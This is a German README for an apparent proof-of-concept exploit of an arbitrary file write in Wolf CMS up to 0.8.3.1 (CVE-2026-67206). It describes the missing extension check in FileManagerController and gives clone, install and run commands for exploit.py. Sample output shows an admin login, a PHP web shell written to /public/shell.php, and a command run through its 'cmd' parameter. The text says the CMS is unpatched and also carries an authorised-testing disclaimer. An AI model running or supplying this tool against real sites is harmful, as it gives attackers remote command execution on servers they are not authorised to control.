
PoC-Exploit für Wolf CMS <= 0.8.3.1: authentifiziert sich beim Admin, schreibt über FileManagerController eine beliebige PHP-Datei nach /public und führt Befehle über eine Web-Shell aus.
Dieses Repository enthält einen Proof-of-Concept-Exploit (PoC) für CVE-2026-67206.
Dieses Projekt dient ausschließlich Bildungszwecken und autorisierten Sicherheitstests. Verwenden Sie es nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine Berechtigung zum Testen haben.
In Wolf CMS-Versionen bis einschließlich 0.8.3.1 besteht eine Schwachstelle, die das beliebige Schreiben von Dateien ermöglicht. Sie erlaubt einem authentifizierten Angreifer, über die Funktionen create_file() und save() der Datei FileManagerController.php schädliche beliebige Dateien in das /public-Verzeichnis des Web-Root zu schreiben. Die Funktion create_file() der Datei FileManagerController.php validiert die Dateierweiterungen nicht, wodurch authentifizierte Angreifer schädliche PHP-Skripte schreiben und Rechte zur Remote-Codeausführung erlangen können.
Alle Versionen von Wolf CMS bis einschließlich 0.8.3.1 sind betroffen. Das Wolf-CMS-Repository wurde am 28. August 2021 archiviert und wird nicht mehr aktiv gepflegt. Für diese Schwachstelle existieren derzeit keine Patches.
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K
[*] Logging in with provided credentials...
[+] Login successful
[*] Creating a file named shell.php...
[+] File creation successful
[*] Attempting to write payload to shell.php...
[+] Payload written successfully!
[+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
[+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data